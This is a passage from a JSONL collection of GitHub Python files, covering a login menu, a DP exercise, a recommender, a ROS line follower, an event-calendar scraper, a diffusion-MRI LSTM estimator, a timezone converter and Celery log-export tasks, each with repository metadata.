ingelogt\")\n\n else:\n print(\"Het wachtwoord of de gebruikersnaam is fout2\")\n\n else:\n print(\"het wachtwoord of de gebruiksnaam is fout\")\n\nwhile True:\n print(\"1. inloggen\")\n print(\"2. nieuwe gebruiker\")\n print(\"3. quit\")\n keuze = input(\"keuze: \")\n\n if keuze == 2:\n nieuwe_gebruiker()\n elif keuze == 1:\n inloggen()\n elif keuze == 3:\n break\n\n","repo_name":"tempestium/Git","sub_path":"Super-Wonder-Captain/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35588246776","text":"t = int(input())\nfor _ in range(t):\n\n n,m = map(int,input().split())\n # case1) DP로 풀기\n dp = [[0]*(m+1) for _ in range(n+1)]\n # 0 1 2 3 4 m\n # 1 1 2 3 4 5 6 7\n # 2 0 1 3 6 10 15 21 ...\n # 3 0 1\n # n 1\n for i in range(n+1):\n for j in range(m+1):\n if i == 1:\n dp[1][j] = j # 서쪽이 1개면, 동쪽루트는 동쪽 다리개수만큼\n \n elif i == j: # 같은 다리 수면, 모든 경우 1\n dp[i][j] = 1\n \n elif i100].sort_values('Correlation'\r\n ,ascending=False)\r\n\r\nprint(a.head())\r\nprint('\\n')\r\n\r\ncorr_liarliar = pd.DataFrame(similar_to_liarliar,columns=['Correlation'])\r\ncorr_liarliar.dropna(inplace=True)\r\ncorr_liarliar = corr_liarliar.join(ratings['num of ratings'])\r\nb=corr_liarliar[corr_liarliar['num of ratings']>100].sort_values('Correlation'\r\n ,ascending=False)\r\nprint(b.head())","repo_name":"thelewlew98/data_science_python_ML","sub_path":"film_recommendation/recommender_systems.py","file_name":"recommender_systems.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26233884648","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport roslib\nroslib.load_manifest('create_eyes')\nimport timeit\nimport sys\nimport rospy\nimport cv2\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import Float64\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Bool\nfrom cv_bridge import CvBridge, CvBridgeError\nimport numpy\nimport math\n\n\nclass line_extractor:\n\n\n def __init__(self):\n self.bridge = CvBridge()\n self.image_sub = rospy.Subscriber(\"/raspicam_node/image_raw\",Image,self.callback)\n# self.control_effort_sub = rospy.Subscriber(\"/control_effort\", Float64, self.control_callback);\n\n #print(\"Param is\", rospy.get_param('default_param', 'default_value'));\n show_images_from_param = rospy.get_param('~show_images', 'False')\n rospy.loginfo('Parameter %s has value %s', rospy.resolve_name('~show_images'), show_images_from_param)\n self.showImages = bool(show_images_from_param);\n\n use_pid_from_param = rospy.get_param('~use_pid', 'True');\n self.use_pid = bool(use_pid_from_param);\n\n self.image = None;\n self.SCALE_FACTOR = 4;\n self.gray_image = None;\n self.prevCx = None;\n self.direction = 0\n self.lineFound = False;\n self.err_pub = rospy.Publisher('line_error', Float32, queue_size=1)\n self.pid_state_pub = rospy.Publisher('state', Float64, queue_size=1)\n self.pid_setpoint_pub = rospy.Publisher('setpoint', Float64, queue_size=1)\n self.line_state_pub = rospy.Publisher('line_visible', Bool, queue_size = 1);\n\n self.twist = Twist()\n\n#def control_callback(self,msg):\n# ctrl_effort = msg.data;\n# print(\"Control Effort is: \" , ctrl_effort); \n\n def callback(self,msg):\n\n #start_time = timeit.default_timer()\n\n kernel = numpy.ones((3,3),numpy.uint8)\n image = self.bridge.imgmsg_to_cv2(msg,desired_encoding='bgr8')\n \n image = cv2.resize(image,(int(320/self.SCALE_FACTOR),int(240/self.SCALE_FACTOR)));\n \n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n hue_img, sat_img, v_img = cv2.split(hsv) # extracting red channel\n \n\n #ret,th1 = cv2.threshold(blur,0,255,cv2.THRESH_OTSU)#using threshold remove noise\n \n #closing = cv2.morphologyEx(th1, cv2.MORPH_CLOSE, kernel)\n #closing = cv2.morphologyEx(closing, cv2.MORPH_CLOSE, kernel)\n \n lower_sat = numpy.array([220])\n upper_sat = numpy.array([255])\n\n sat_mask = cv2.inRange(sat_img, lower_sat, upper_sat);\n\n lower = numpy.uint8([0, 120, 120])\n upper = numpy.uint8([255, 255, 255])\n\n #yellow_mask = cv2.inRange(hsv, lower_yellow, upper_yellow);\n #masked = cv2.bitwise_and(image, image, mask = yellow_mask)\n\n yellow_mask = cv2.inRange(image, lower, upper);\n if(self.showImages):\n cv2.imshow('sat',sat_mask);\n cv2.waitKey(3);\n #sat_masked = cv2.bitwise_and(image,image,mask=sat_mask);\n masked = cv2.bitwise_and(sat_mask, sat_mask, mask = yellow_mask)\n\n masked=cv2.GaussianBlur(masked,(3,3),2)#blur the grayscale image\n masked = cv2.morphologyEx(masked,cv2.MORPH_ERODE, kernel)\n #yellow_mask = cv2.inRange(image, lower, upper)\n if(self.showImages):\n cv2.imshow('y',masked);\n cv2.waitKey(3)\n #mask = closing;\n mask = masked;\n\n h, w, d = image.shape\n if(self.use_pid):\n self.pid_setpoint_pub.publish(float(w)/2.0);\n search_top = 0;\n search_bot = 2*h/3;\n search_left = w/4;\n search_right = 3*w/4;\n mask[0:search_top, 0:w] = 0\n mask[search_bot:h, 0:w] = 0\n mask[0:h, 0:search_left] = 0\n mask[0:h, search_right:w] = 0\n if(self.showImages):\n cv2.imshow(\"a\",mask);\n cv2.waitKey(3);\n M = cv2.moments(mask)\n if M['m00'] > 0:\n cx = int(M['m10']/M['m00'])\n cy = int(M['m01']/M['m00'])\n \n if(self.use_pid):\n self.pid_state_pub.publish(float(cx));\n #The proportional controller is implemented in the following four lines which\n #is reposible of linear scaling of an error to drive the control output.\n cv2.circle(image, (int(cx), int(cy)), 5, (0,0,255), -1) \n\n\t\n if self.prevCx is None:\n self.prevCx = cx;\n \n#smoothing cx\n\n cx = self.prevCx*0.5 + cx*0.5;\n\n self.prevCx = cx;\n\n err = cx - w/2\n\n err = self.SCALE_FACTOR * err;\n\n self.line_state_pub.publish(True);\n if(not self.use_pid):\n self.err_pub.publish(err);\n#print(\"Err is: \", err);\n\n else: #Moment not available. Probably, line isn't there\n err = -1000.0;\n self.line_state_pub.publish(False);\n self.err_pub.publish(err);\n \n if(self.showImages):\n cv2.imshow(\"window\", image)\n cv2.waitKey(3)\n\ndef main(args):\n rospy.init_node('line_extractor', anonymous=True)\n ic = line_extractor()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n rospy.loginfo(\"Shutting down\")\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main(sys.argv)\n\n","repo_name":"hs29590/create_eyes","sub_path":"src/followLine2.py","file_name":"followLine2.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70314979368","text":"import math\n\ndef calculate_haversine(lon1, lat1, lon2, lat2):\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2\n c = 2 * math.asin(math.sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r\n\n\ndef split_string(string):\n return string.split(',')\n\n\ndef removeDEfromsortedDEs(assigned_executive, DEs):\n for de in DEs:\n if de.id == assigned_executive:\n DEs.remove(de)\n return DEs\n","repo_name":"kloudd/deliveryAssignment","sub_path":"utility_functions.py","file_name":"utility_functions.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9396168699","text":"\"\"\"File containing all weather inforamtion and modifiers\"\"\"\n\nclass Weather():\n \"\"\"defines all the available weathers\"\"\"\n\n def __init__(self, name, min_duration, max_duration, temp_modifier, humidity_modifier, icon_filepath=None):\n \"\"\"containes all referances to all the information kept with all individual weather options\n \n arg:\n name(str) = the name of the weather\n min_duration(int) = minimum amount of time the weather lasts for\n max_duration(int) = maximum amount of time the weather lasts for\n temp_modifier(int) = value to modify the base temp of the hex biome\n humidity_modifier(int) = value to modify the base humidity of the hex biome\n icon_filepath(str) = location of the icon associated with the weather\n \n return:\n (Weather) = returns list of allowable weathers\n \"\"\"\n \n self.name = name\n self.min_duration = min_duration\n self.max_duration = max_duration\n self.temp_modifier = temp_modifier\n self.humidity_modifier = humidity_modifier\n self.icon_filepath = icon_filepath\n\n\nif __name__ == '__main__':\n test_weather = Weather(\"mountain\", 2, 6, 5, 30, \"test\")\n ","repo_name":"lowear/dnd_weather_tool","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38540927899","text":"#from icalendar import Calendar, Event\nfrom ics import Calendar, Event\nfrom urllib.request import urlretrieve\nfrom lxml import etree\nimport os\nimport time\nimport re\nimport datetime\nimport arrow\n\ndef display(cal):\n return cal.to_ical().decode('utf-8').replace('\\r\\n', '\\n').strip()\n\ndef getCal(regex):\n file='cache.html'\n details_cache='details.txt'\n\n format=\"%d.%m.%Y %H:%M\"\n\n if not os.path.exists(file) or time.time()-os.path.getmtime(file)>60:\n print('cache too old')\n urlretrieve('http://www.gullivers.banda.cz/nejblizsi-akce/',file)\n else:\n print('using cache')\n\n\n htmlparser = etree.HTMLParser(encoding='utf-8')\n tree = etree.parse(file,htmlparser)\n res=tree.xpath('//div[@class=\"event fulllist underline\"]')\n #res=tree.xpath('//body')\n\n details=[]\n for line in open(details_cache,'r',encoding='utf-8').readlines():\n s=line.replace('\\n','').split('\\t')\n #print(s)\n if time.time()-datetime.datetime.strptime(s[2], format).timestamp()<60*30:\n details.append((s[0],s[1],s[2]))\n\n #print(details)\n\n cal = Calendar()\n\n for event in res:\n title=event[0][0].text\n if re.search(regex,title):\n url=event[0][0].items()[0][1]\n timenode=event[1][0].xpath('node()')[1].replace(' - \\n ','')\n interval=timenode.split(' - ')\n print(title,event[1][0][0].text,timenode,url)\n start_time=datetime.datetime.strptime(interval[0], format)\n try:\n end_time=datetime.datetime.strptime(interval[1], format)\n except ValueError:\n end_time=datetime.datetime.strptime(interval[1], \"%H:%M\")\n end_time=end_time.replace(day=start_time.day,month=start_time.month,year=start_time.year)\n #print(dir(event[1][0]))\n print(start_time,' - ',end_time)\n\n #print('')\n\n find=list(filter(lambda x: x[1]==url,details))\n if len(find):\n location=find[0][0]\n #'http://www.gullivers.banda.cz'\n else:\n urlretrieve('http://www.gullivers.banda.cz'+url,'tmp')\n tree = etree.parse('tmp', htmlparser)\n res = tree.xpath('//p[@class=\"location\"]')\n details.append((res[0].text,url,datetime.datetime.fromtimestamp(time.time()).strftime(format)))\n location=res[0].text\n print(location)\n\n\n event = Event(location=location)\n event.name=title\n event.begin = arrow.get(start_time,'Europe/Prague')\n event.end = arrow.get(end_time,'Europe/Prague')\n\n cal.events.append(event)\n\n with open(details_cache,'w',encoding='utf-8') as d:\n for detail in details:\n for col in detail:\n d.write(col+'\\t')\n d.write('\\n')\n\n with open('my.ics', 'w', encoding='utf-8') as my_file:\n my_file.writelines(cal)\n\n return\n\n\n\n","repo_name":"mittermichal/banda-ical","sub_path":"banda_parser.py","file_name":"banda_parser.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30887361418","text":"from flask import Blueprint, request, jsonify\nfrom .controllers.reserva_controller import guardar_reserva\n\n# Crear el Blueprint para las rutas del restaurante\nrestaurante_bp = Blueprint('restaurante', __name__)\n\n# Ruta para recibir los datos del formulario de reserva\n@restaurante_bp.route('/reservas', methods=['POST'])\ndef reservas():\n nombre = request.form.get('nombre')\n correo = request.form.get('correo')\n numero = request.form.get('numero')\n\n # Validar los datos del formulario\n\n # Guardar la reserva en la base de datos\n reserva_id = guardar_reserva(nombre, correo, numero)\n\n # Realizar otras acciones necesarias\n\n # Devolver una respuesta JSON\n return jsonify({'message': 'Reserva exitosa', 'reserva_id': reserva_id})\n\n# Resto de las rutas y lógica del restaurante...\n\n","repo_name":"7dead7/carrizales","sub_path":"backend/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8135023957","text":"import os\nimport random\nimport argparse\nimport numpy as np\nimport json\nimport torch\nimport joblib\nimport time\n\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\n\nfrom util_dev import device\nfrom utils import min_max_scale, custom_scale, preprocess_datasets, preprocess_input_dataset, setup_log\nfrom RNNEncoderDecoder import EncoderRNN, AttnDecoderRNN\n\ndef predict(encoder, decoder, input_tensor, output_length):\n with torch.no_grad():\n bz = input_tensor.size(0)\n\n outputs = torch.zeros(bz, output_length, device=device)\n\n encoder_outputs, encoder_hidden, encoder_cell = encoder(input_tensor)\n\n decoder_hidden = encoder_hidden[-1]\n decoder_cell = encoder_cell[-1]\n #decoder_attentions = torch.zeros(input_length, input_length)\n decoder_input = input_tensor[:, -1].view(-1,1)\n\n for di in range(output_length):\n decoder_output, decoder_hidden, decoder_cell, decoder_attention = decoder(\n decoder_input, decoder_hidden, decoder_cell, encoder_outputs)\n #decoder_attentions[di] = decoder_attention.data\n decoder_input = decoder_output.detach().view(-1,1)\n outputs[:, di] = decoder_input[:,0]\n\n return outputs \n\ndef prediction(encoder, decoder, data_loader, scale_type=0, out_scale=None, output_length=5, \n has_target=False, wmti_ranges=[[0, 1], [0, 4], [0, 3], [0, 3], [0, 1]], intercept=None, encoder_file='', \n decoder_file='', encoder_ckpt='', decoder_ckpt='', logger=None, save_dir=''):\n\n if os.path.isfile(encoder_file) and os.path.isfile(decoder_file):\n encoder.load_state_dict(torch.load(encoder_file, map_location=device))\n decoder.load_state_dict(torch.load(decoder_file, map_location=device))\n elif os.path.isfile(encoder_ckpt) and os.path.isfile(decoder_ckpt):\n checkpoint1 = torch.load(encoder_ckpt, map_location=device)\n encoder.load_state_dict(checkpoint1['model_state_dict'])\n checkpoint2 = torch.load(decoder_ckpt, map_location=device)\n decoder.load_state_dict(checkpoint2['model_state_dict']) \n else:\n print(\"No model files found!!!\")\n return False\n\n batch_errors = []\n for i, datas in enumerate(data_loader):\n input_tensor = datas[0].to(device) \n if has_target: \n bz = input_tensor.size(0)\n _index_in_batch = random.randint(0, bz-1)\n target_tensor = datas[1].to(device) \n targets = target_tensor.cpu().detach().numpy() \n\n outputs_ = predict(encoder, decoder, input_tensor, output_length) \n outputs = outputs_.cpu().detach().numpy()\n \n if scale_type == 1:\n outputs = custom_scale(outputs, out_scale, b=intercept, inverse_transform=True)\n if has_target: targets = custom_scale(targets, out_scale, b=intercept, inverse_transform=True)\n elif scale_type == 2:\n outputs=min_max_scale(outputs, multipler=out_scale, ranges=wmti_ranges, inverse_transform=True)\n if has_target: targets=min_max_scale(targets, multipler=out_scale, ranges=wmti_ranges, inverse_transform=True)\n\n if i==0: \n predictions = np.copy(outputs) \n if has_target: targets_all = np.copy(targets)\n else:\n predictions = np.concatenate((predictions, outputs), axis=0) \n if has_target: targets_all = np.concatenate((targets_all, targets), axis=0)\n\n if has_target:\n rmse = mean_squared_error(targets, outputs, squared=False)\n errs = mean_squared_error(targets, outputs, multioutput='raw_values', squared=False)\n batch_errors.append(rmse)\n if logger != None:\n logger.info(f\"--batch#{i}, mean errors: {errs}\")\n logger.info(f\"--batch#{i}, GT: {np.round(targets[_index_in_batch, :], 5)}\")\n logger.info(f\"--batch#{i}, PD: {np.round(outputs[_index_in_batch, :], 5)} \\n\")\n\n if has_target: \n plt.plot(batch_errors) \n plt.show() \n\n if os.path.isdir(save_dir) and has_target:\n np.save(f\"{save_dir}/wmti_target.npy\", targets_all)\n\n return predictions\n\ndef main(args):\n mode = \"estimation\"\n datapath = args.datapath\n model_path = os.path.join(datapath, args.model_folder)\n if not os.path.exists(model_path): os.mkdir(model_path) \n output_path = os.path.join(model_path, args.output_dir)\n if not os.path.exists(output_path): os.makedirs(output_path)\n logpath = output_path if args.logpath==None else args.logpath\n logger = setup_log(logpath, f\"{args.logname}-{mode}\")\n\n checkpoint_path = os.path.join(model_path, 'checkpoints')\n\n logger.info(f\"device: {device}\")\n logger.info(f\"model path: {model_path}\")\n \n with open(f\"{output_path}/estimation_args.json\", 'w') as jf:\n json.dump(args.__dict__, jf, indent=2)\n\n ## input normalization\n data_norm=args.data_normalizatioin \n dki_norm_scaler_file = None\n dki_norm_scaler = None\n if args.dki_scaler_filename: \n dki_norm_scaler_file = f\"{checkpoint_path}/{args.dki_scaler_filename}\"\n dki_norm_scaler = joblib.load(dki_norm_scaler_file)\n logger.info(f\"data norm: {data_norm}, dki normalization scaler: {dki_norm_scaler_file}\")\n\n ## output scaling\n scale_type = args.output_scale_type \n out_scale = args.out_scale \n intercept = args.out_intercept \n logger.info(f\"scale_type: {scale_type}, target scale: {out_scale}, intercept: {intercept}\")\n\n dataset_fn = args.dataset \n batch_size= args.batch_size\n has_target=args.has_target\n\n logger.info(f\"dataset: {dataset_fn}, batch size: {batch_size}\")\n\n if has_target:\n data_loader, _, _, _ = preprocess_datasets(datapath, mat_filename=dataset_fn, batch_size=batch_size, train_perc=0.95, val_perc=0.01,\n data_norm=data_norm, scale_type=scale_type, scale=out_scale, intercept=intercept, \n dki_norm_type=args.input_scale_type, x_scaler=dki_norm_scaler) \n else:\n data_loader, dki, _ = preprocess_input_dataset(datapath, mat_filename=dataset_fn, batch_size=batch_size, x_scaler=dki_norm_scaler, dki_norm_type=args.input_scale_type) \n ##\n hidden_size = args.hidden_size\n norm = args.model_normalization\n input_seq_length = args.input_seq_length\n output_seq_length = args.output_seq_length \n \n encoder = EncoderRNN(1, hidden_size, seq_length=input_seq_length, normalization=norm, num_layers=1).to(device)\n attn_decoder = AttnDecoderRNN(hidden_size, 1, x_seq_length=input_seq_length, dropout=args.dropout, normalization=norm).to(device)\n\n ckpt_epoch = args.load_checkpoint\n enc_ckt = f'{checkpoint_path}/ckpt_ep-{ckpt_epoch}_encoder.pt' if ckpt_epoch > 0 else ''\n dec_ckt = f'{checkpoint_path}/ckpt_ep-{ckpt_epoch}_decoder.pt' if ckpt_epoch > 0 else ''\n enc_file= f'{checkpoint_path}/lstm_encoder.pt' if ckpt_epoch <= 0 else ''\n dec_file = f'{checkpoint_path}/lstm_decoder.pt' if ckpt_epoch <= 0 else '' \n t_ = time.time()\n wmti = prediction(encoder, attn_decoder, data_loader, scale_type, out_scale, logger=logger, has_target=has_target, intercept=intercept, output_length=output_seq_length,\n encoder_file=enc_file, decoder_file=dec_file, encoder_ckpt=enc_ckt, decoder_ckpt=dec_ckt, save_dir=output_path) \n logger.info(f\"Estimation time: {np.round_(time.time() - t_, 3)} s\")\n\n np.save(f\"{output_path}/wmti_estimate.npy\", wmti) \n if not has_target:\n np.save(f\"{output_path}/input_dki.npy\", dki) \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--has_target\", default=False, type=bool)\n parser.add_argument(\"--dataset\", type=str) # #wmti_dki_validate_estimation.mat\n parser.add_argument(\"--dropout\", default=0., type=float)\n parser.add_argument(\"--logpath\", default=None)\n parser.add_argument(\"--logname\", default='lstm', type=str)\n\n parser.add_argument(\"--datapath\", type=str)\n parser.add_argument(\"--model_folder\", type=str)\n parser.add_argument(\"--output_dir\", default='estimation',type=str) \n parser.add_argument(\"--input_scale_type\", default=3, type=int)\n parser.add_argument(\"--dki_scaler_filename\", default=None, type=str)\n parser.add_argument(\"--output_scale_type\", default=2, type=int)\n parser.add_argument(\"--out_scale\", nargs=\"+\", default=[100], type=int)\n parser.add_argument(\"--out_intercept\", default=None)\n parser.add_argument(\"--data_normalizatioin\", default=True)\n\n parser.add_argument(\"--batch_size\", default=2048, type=int)\n parser.add_argument(\"--hidden_size\", default=96, type=int)\n parser.add_argument(\"--model_normalization\", default=True, type=bool)\n parser.add_argument(\"--input_seq_length\", default=6, type=int)\n parser.add_argument(\"--output_seq_length\", default=5, type=int)\n parser.add_argument(\"--load_checkpoint\", default=1000, type=int)\n\n args = parser.parse_args()\n main(args) \n","repo_name":"Mic-map/WMTI-Watson_DL","sub_path":"model/wmti_estimate.py","file_name":"wmti_estimate.py","file_ext":"py","file_size_in_byte":9052,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"15386873906","text":"from importlib import util\r\nfrom datetime import datetime, time, date\r\nfrom pytz import timezone\r\nfrom sys import exit\r\nimport time\r\nimport argparse\r\n\r\nparser = argparse.ArgumentParser()\r\nparser = argparse.ArgumentParser(description=\"Convert amongst UTC/IST/CET Timezones\")\r\nparser.add_argument(\"-z\", help=\"u|i|c Input time in UTC|IST|CET [Default: Current Zone]\", nargs='?')\r\nparser.add_argument(\"-t\", help=\"Input time in format \\\"\\\" (DoubleQuotes is must) [Default: Current Time]\", nargs='?')\r\nparser.add_argument(\"-d\", help=\"Input date in format \\\"\\\" (DoubleQuotes is must) [Default: Current Date]\", nargs='?')\r\nargs = parser.parse_args()\r\nd=args.d\r\nt=args.t\r\nch=args.z\r\n\r\ndef utc(t):\r\n tm=datetime.strptime(t,f)\r\n ist=timezone('UTC').localize(tm, is_dst=None).astimezone(timezone('Asia/Kolkata'))\r\n cet=timezone('UTC').localize(tm, is_dst=None).astimezone(timezone('Europe/Paris'))\r\n print(\"\\r\\tIST: {}\\tCET: {}\".format(ist.strftime(f),cet.strftime(f)), end=\"\")\r\n\r\ndef ist(t):\r\n tm=datetime.strptime(t,f)\r\n utc=timezone('Asia/Kolkata').localize(tm, is_dst=None).astimezone(timezone('UTC'))\r\n cet=timezone('Asia/Kolkata').localize(tm, is_dst=None).astimezone(timezone('Europe/Paris'))\r\n print(\"\\r\\tUTC: {}\\tCET: {}\".format(utc.strftime(f),cet.strftime(f)), end=\"\")\r\n\r\ndef cet(t):\r\n tm=datetime.strptime(t,f)\r\n utc=timezone('Europe/Paris').localize(tm, is_dst=None).astimezone(timezone('UTC'))\r\n ist=timezone('Europe/Paris').localize(tm, is_dst=None).astimezone(timezone('Asia/Kolkata'))\r\n print(\"\\r\\tUTC: {}\\tIST: {}\".format(utc.strftime(f),ist.strftime(f)), end=\"\")\r\n \r\nif d == None and t != None:\r\n d=date.today().strftime(\"%Y-%m-%d\")\r\n \r\nif ch == None:\r\n if -time.timezone == 19800:\r\n ch='i'\r\n elif -time.timezone == 7200:\r\n ch='c'\r\n else:\r\n ch='u'\r\n\r\nf = \"%Y-%m-%d %H:%M:%S\"\r\nt=d+' '+t\r\n \r\nif t == None:\r\n \r\n if ch == 'u':\r\n while True:\r\n t=datetime.now().strftime(f)\r\n utc(t)\r\n time.sleep(1)\r\n elif ch == 'c':\r\n while True:\r\n t=datetime.now().strftime(f)\r\n cet(t)\r\n time.sleep(1)\r\n elif ch == 'i':\r\n while True:\r\n t=datetime.now().strftime(f)\r\n ist(t)\r\n time.sleep(1)\r\n else:\r\n exit(\"Wrong Input, Input must be u|i|c\")\r\n\r\nelse:\r\n if ch == 'u':\r\n utc(t)\r\n elif ch == 'c':\r\n cet(t)\r\n elif ch == 'i':\r\n ist(t)\r\n else:\r\n exit(\"Wrong Input, Input must be u|i|c\")\r\n","repo_name":"1bl4z3r/boredhub","sub_path":"timezone.py","file_name":"timezone.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29583427022","text":"import os\nimport tarfile\nimport json\nimport datetime\nimport pytz\nimport arrow\n\nfrom django.utils.translation import gettext as _\nfrom django.utils import translation\nfrom celery.schedules import crontab\nfrom django.conf import settings\nfrom django.utils.crypto import get_random_string\nfrom django.utils import timezone\nfrom celery.task import task, periodic_task\n\nfrom apps.constants import RemoteStorageType\nfrom apps.log_search.constants import (\n ASYNC_DIR,\n FEATURE_ASYNC_EXPORT_COMMON,\n ASYNC_EXPORT_EMAIL_TEMPLATE,\n ASYNC_EXPORT_FILE_EXPIRED_DAYS,\n ASYNC_EXPORT_EXPIRED,\n ASYNC_APP_CODE,\n FEATURE_ASYNC_EXPORT_NOTIFY_TYPE,\n FEATURE_ASYNC_EXPORT_STORAGE_TYPE,\n MAX_RESULT_WINDOW,\n MsgModel,\n ASYNC_EXPORT_EMAIL_ERR_TEMPLATE,\n ExportStatus,\n)\nfrom apps.log_search.exceptions import PreCheckAsyncExportException\nfrom apps.log_search.handlers.search.search_handlers_esquery import SearchHandler\nfrom apps.log_search.models import Scenario, AsyncTask, LogIndexSet\nfrom apps.feature_toggle.handlers.toggle import FeatureToggleObject\nfrom apps.utils.log import logger\nfrom apps.utils.notify import NotifyType\nfrom apps.utils.remote_storage import StorageType\n\n\n@task(ignore_result=True, queue=\"async_export\")\ndef async_export(\n search_handler: SearchHandler,\n sorted_fields: list,\n async_task_id: int,\n url_path: str,\n search_url_path: str,\n language: str,\n):\n \"\"\"\n 异步导出任务\n @param search_handler {SearchHandler}\n @param sorted_fields {List}\n @param async_task_id {Int}\n @param url_path {Str}\n @param search_url_path {Str}\n @param language {Str}\n \"\"\"\n random_hash = get_random_string(length=10)\n time_now = arrow.now().format(\"YYYYMMDDHHmmss\")\n file_name = f\"{ASYNC_APP_CODE}_{search_handler.index_set_id}_{time_now}_{random_hash}\"\n tar_file_name = f\"{file_name}.tar.gz\"\n async_task = AsyncTask.objects.filter(id=async_task_id).first()\n async_export_util = AsyncExportUtils(\n search_handler=search_handler,\n sorted_fields=sorted_fields,\n file_name=file_name,\n tar_file_name=tar_file_name,\n )\n try:\n if not async_task:\n logger.error(f\"Can not find this: id: {async_task_id} record\")\n raise BaseException(f\"Can not find this: id: {async_task_id} record\")\n\n async_task.export_status = ExportStatus.DOWNLOAD_LOG\n try:\n async_export_util.export_package()\n except Exception as e: # pylint: disable=broad-except\n async_task = set_failed_status(async_task=async_task, reason=f\"export package error: {e}\")\n raise\n\n async_task.export_status = ExportStatus.EXPORT_PACKAGE\n async_task.file_name = tar_file_name\n async_task.file_size = async_export_util.get_file_size()\n try:\n async_export_util.export_upload()\n except Exception as e: # pylint: disable=broad-except\n async_task = set_failed_status(async_task=async_task, reason=f\"export upload error: {e}\")\n raise\n\n async_task.export_status = ExportStatus.EXPORT_UPLOAD\n try:\n url = async_export_util.generate_download_url(url_path=url_path)\n except Exception as e: # pylint: disable=broad-except\n async_task = set_failed_status(async_task=async_task, reason=f\"generate download url error: {e}\")\n raise\n\n async_task.download_url = url\n\n try:\n async_export_util.send_msg(\n index_set_id=search_handler.index_set_id,\n async_task=async_task,\n search_url_path=search_url_path,\n language=language,\n )\n except Exception as e: # pylint: disable=broad-except\n async_task = set_failed_status(async_task=async_task, reason=f\"send msg error: {e}\")\n raise\n\n except Exception as e: # pylint: disable=broad-except\n logger.exception(e)\n async_export_util.send_msg(\n index_set_id=search_handler.index_set_id,\n async_task=async_task,\n search_url_path=search_url_path,\n language=language,\n name=ASYNC_EXPORT_EMAIL_ERR_TEMPLATE,\n title_model=MsgModel.ABNORMAL,\n )\n return\n\n async_task.result = True\n async_task.export_status = ExportStatus.SUCCESS\n async_task.completed_at = timezone.now()\n async_task.save()\n\n async_export_util.clean_package()\n # 过$ASYNC_EXPORT_EXPIRED将对应状态置为ExportStatus.EXPIRED\n set_expired_status.apply_async(args=[async_task.id], countdown=ASYNC_EXPORT_EXPIRED)\n\n\ndef set_failed_status(async_task: AsyncTask, reason):\n async_task.failed_reason = reason\n async_task.export_status = ExportStatus.FAILED\n logger.error(async_task.failed_reason)\n async_task.save()\n return async_task\n\n\n@task(ignore_result=True)\ndef set_expired_status(async_task_id):\n async_task = AsyncTask.objects.get(id=async_task_id)\n async_task.export_status = ExportStatus.DOWNLOAD_EXPIRED\n async_task.save()\n\n\n@periodic_task(run_every=crontab(minute=\"10\", hour=\"3\"))\ndef clean_expired_status():\n \"\"\"\n change success status -> export_expired status\n \"\"\"\n\n AsyncTask.objects.filter(export_status=ExportStatus.SUCCESS).filter(\n completed_at__lt=arrow.now().shift(seconds=-ASYNC_EXPORT_EXPIRED).datetime\n ).update(export_status=ExportStatus.DOWNLOAD_EXPIRED)\n\n\n@periodic_task(run_every=crontab(minute=\"0\", hour=\"3\"))\ndef clean_expired_task():\n \"\"\"\n clean expired task file\n expired_time: 2days\n\n \"\"\"\n day_ago = datetime.datetime.now(pytz.timezone(\"UTC\")) - datetime.timedelta(days=ASYNC_EXPORT_FILE_EXPIRED_DAYS)\n # 获取过期的内网下载文件\n expired_task_list = AsyncTask.objects.filter(created_at__lt=day_ago, is_clean=False)\n # nfs文件需要进行定期清理操作\n storage_type = FeatureToggleObject.toggle(FEATURE_ASYNC_EXPORT_COMMON).feature_config.get(\n FEATURE_ASYNC_EXPORT_STORAGE_TYPE\n )\n\n if storage_type or storage_type == RemoteStorageType.NFS.value:\n # 删除NFS文件\n for expired_task in expired_task_list:\n target_file_dir = os.path.join(settings.EXTRACT_SAAS_STORE_DIR, expired_task.file_name)\n if os.path.isfile(target_file_dir):\n os.remove(os.path.abspath(target_file_dir))\n expired_task.is_clean = True\n expired_task.save()\n\n\nclass AsyncExportUtils(object):\n \"\"\"\n async export utils(export_package, export_upload, generate_download_url, send_msg, clean_package)\n \"\"\"\n\n def __init__(self, search_handler: SearchHandler, sorted_fields: list, file_name: str, tar_file_name: str):\n \"\"\"\n @param search_handler: the handler cls to search\n @param sorted_fields: the fields to sort search result\n @param file_name: the export file name\n @param tar_file_name: the file name which will be 